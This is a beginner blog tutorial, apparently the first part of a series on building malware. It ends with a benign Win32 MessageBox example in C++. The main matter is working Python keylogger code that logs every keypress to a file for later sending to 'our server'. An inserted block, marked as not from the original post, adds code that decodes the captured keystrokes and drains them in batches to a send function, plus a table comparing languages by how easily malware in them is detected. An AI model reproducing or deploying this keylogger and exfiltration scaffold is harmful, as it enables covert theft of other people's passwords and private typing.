Intro to how to make malware

Hi guys

Well, I have decided to build malware, so let’s make it together.

What is malware?

Just a piece of code. Let's take an example from the gaming world: how can a game detect which key you have pressed? Let's look at this piece of code. Don't panic; we will use Python for simplicity, but don't expect that every time :)

from pynput import keyboard

def on_press_func(key):
	# do something for the game with the key that was pressed
	pass

listener = keyboard.Listener(on_press=on_press_func)
listener.start()
listener.join()  # the listener runs in a background thread; join keeps the program alive

So how can that be malware? Yes, that is a keylogger. What does a keylogger do? It just saves what you press on the keyboard and then sends it somewhere, or whatever else it does. Let's see what a keylogger looks like.

from pynput import keyboard

def on_press_func(key):
	# append every key press to a file in the current directory
	with open('keylogs.txt', 'a') as logs:
		logs.write(str(key))

listener = keyboard.Listener(on_press=on_press_func)
listener.start()
listener.join()  # keep running; the hook lives in the listener's thread

We can then send this file to our server or wherever. So we are simply making a program that does whatever we want it to do.
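The logger above writes str(key) for every press with no separator, so the file reads like 'h''e''l''l''o'Key.space... rather than the text that was typed. The following is an added example, not code from the original post: it parses that format back into the typed text (handling Backspace, modifiers and Ctrl+letter combinations), and shows the "send it to our server" step as a drain function that hands each batch to a caller-supplied send callable (no server is assumed; the caller decides what send does). It relies only on how pynput formats keys as strings (repr() of the character for normal keys, Key.name for special keys, <vk> for keys that only carry a virtual-key code); the sample log is constructed, not captured, and the function names are my own.

```python
import ast
import re

# One regex alternative per token shape str(key) produces in pynput:
#   'a' / "'"  : a printable KeyCode, written as repr() of the character
#   Key.space  : a member of pynput.keyboard.Key (names are lowercase, so the
#                character class stops before the next "Key." because the log
#                above writes tokens with no separator)
#   <65>       : a KeyCode that only carries a virtual-key code
TOKEN_RE = re.compile(r"""'([^']*)'|"([^"]*)"|(Key\.[a-z0-9_]+)|<(\d+)>""")

SPECIAL = {"Key.space": " ", "Key.enter": "\n", "Key.tab": "\t"}
MODIFIERS = {
    "Key.shift", "Key.shift_l", "Key.shift_r",
    "Key.ctrl", "Key.ctrl_l", "Key.ctrl_r",
    "Key.alt", "Key.alt_l", "Key.alt_r", "Key.alt_gr",
    "Key.cmd", "Key.cmd_l", "Key.cmd_r", "Key.caps_lock",
}

# Constructed sample, not a captured log: "hello", space, Shift+W, "orls",
# Backspace, "d", Enter, Ctrl+C (arrives as the control character \x03), F5.
SAMPLE_LOG = (
    "'h''e''l''l''o'Key.spaceKey.shift'W''o''r''l''s'Key.backspace'd'Key.enter"
    "'\\x03'Key.f5"
)


def tokenize(log: str) -> list:
    """Split the separator-less log back into one item per key press."""
    tokens = []
    for m in TOKEN_RE.finditer(log):
        if m.group(3):
            tokens.append(m.group(3))                    # Key.xxx as-is
        elif m.group(4):
            tokens.append(f"<vk{m.group(4)}>")           # vk-only key
        else:
            tokens.append(ast.literal_eval(m.group(0)))  # undo repr()
    return tokens


def reconstruct(log: str) -> str:
    """Turn the raw log into the text that was typed.

    Backspace drops the previous item (an approximation: it also removes a
    <marker>), modifiers are dropped because pynput already reports the
    shifted character, and keys with no text equivalent become <name> markers.
    """
    out = []
    for tok in tokenize(log):
        if tok == "Key.backspace":
            if out:
                out.pop()
        elif tok in MODIFIERS:
            continue
        elif tok in SPECIAL:
            out.append(SPECIAL[tok])
        elif tok.startswith("Key."):
            out.append(f"<{tok[4:]}>")
        elif len(tok) == 1 and ord(tok) < 32:
            # Ctrl+<letter> is delivered as a control character: Ctrl+C == '\x03'
            out.append(f"<ctrl-{chr(ord(tok) + 64).lower()}>")
        else:
            out.append(tok)
    return "".join(out)


def drain_log(path: str, send) -> str:
    """The "send it to our server" step: read what has been logged so far,
    truncate the file so the next batch starts empty, and hand the decoded
    text to `send` (any callable, e.g. an HTTP POST; nothing is transmitted
    unless the caller provides it). Returns the decoded batch."""
    with open(path, "r+", encoding="utf-8") as f:
        raw = f.read()
        f.seek(0)
        f.truncate()
    text = reconstruct(raw)
    if text:
        send(text)
    return text


if __name__ == "__main__":
    print(repr(reconstruct(SAMPLE_LOG)))  # 'hello World\n<ctrl-c><f5>'
```

Run it as a script to decode the constructed sample, or point drain_log at the keylogs.txt the logger above produces. On the defensive side, note what this logger leaves behind: on Windows pynput installs a low-level keyboard hook (WH_KEYBOARD_LL through SetWindowsHookEx), and the script opens and appends to a file after every single key press, both of which stand out in process and file-activity telemetry.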

Now, what do we need to know before we start coding?

  1. What kind of malware it is (Trojan, worm, virus, etc.)
  2. Which protocol it will use (TCP, UDP, HTTP, HTTPS)
  3. Which programming language you want to use:

     Language      Detection (how easily it gets flagged)   Binary size   Performance
     Python/Ruby   Easy                                     Large         Slow
     Golang        Medium                                   Large         Medium
     C/C++         Hard                                     Small         Fast

So you are free to use whatever you want. I'm going to use C++. So all we need is a C++ compiler and a VM to play in.

Let's start with a simple message box. But first, we have to know some basics. What is the Win32 API? Also referred to as the Windows API or WinAPI, Win32 is the main set of Microsoft Windows APIs used for developing Windows applications (the name comes from its 32-bit origins; 64-bit programs use the same API). These APIs cover functions in the following categories:

  • Administration and Management - Install, configure, and service applications or systems.
  • Diagnostics - Troubleshoot application and system problems, and monitor performance.
  • Graphics and Multimedia - Incorporate formatted text, graphics, audio, and video.
  • Networking - Communicate between applications on different computers on a network.
  • Security - Password authentication, discretionary protection for all sharable system objects, privileged access control, rights management, and security auditing.
  • System Services - Gives access to computer resources and the underlying operating system, such as memory, file system, devices, processes, and threads.
  • Windows User Interface - Create and manage a user interface, such as display output, prompt for user input, and support for user interaction.

So generally, you can control almost anything with those APIs. But how? Let's try. You can find whatever you need in the Microsoft docs, for example the MessageBox function.

Syntax

int MessageBoxA(
  HWND   hWnd,
  LPCSTR lpText,
  LPCSTR lpCaption,
  UINT   uType
);

So it's a function that returns an int indicating which button the user clicked (0 means the box could not be created at all, for example when memory runs out). Note that this is the ANSI version, so the strings are plain char strings; MessageBoxW takes wide (UTF-16) strings, and the bare name MessageBox is a macro that picks one of the two depending on whether UNICODE is defined. Our first task is making a program that shows a message box with "Hello From Nakerah" as the text and any title you want.

#include <windows.h>

// Entry point of a Windows (GUI-subsystem) program; the runtime calls this instead of main().
int APIENTRY WinMain( HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow )
{
	// No owner window (NULL), the text, the title, and a single OK button.
	MessageBoxA( NULL, "Hello From Nakerah", "Nakerah NG", MB_OK );
	return 0;
}

Let's analyze this simple piece of code. Well, it just includes windows.h and then the mai.. what? Where is the main function? Don't panic. A graphical Windows program (one built for the Windows subsystem, so no console window appears) has an entry-point function named WinMain or wWinMain instead of main; a console program can still use a normal main. You can find more in the Microsoft docs. Now the next line: the MessageBoxA call takes four parameters:

  • ‘hWnd’: a handle to the owner window. I set it to NULL, which means the message box has no owner window.
  • ‘lpText’: the string we want the message box to show.
  • ‘lpCaption’: the title of the box.
  • ‘uType’: which buttons (and optionally which icon) the box has; MB_OK gives a single OK button.

Let's compile. I used DEV as a compiler. The steps are simple:

  • Create a new document (project), then copy and paste the above code.
  • Compile, then run.
  • Save it wherever you want. You will find two files, one with an exe extension and another with a cpp extension. Double click the exe file and

That’s enough for today. See you :)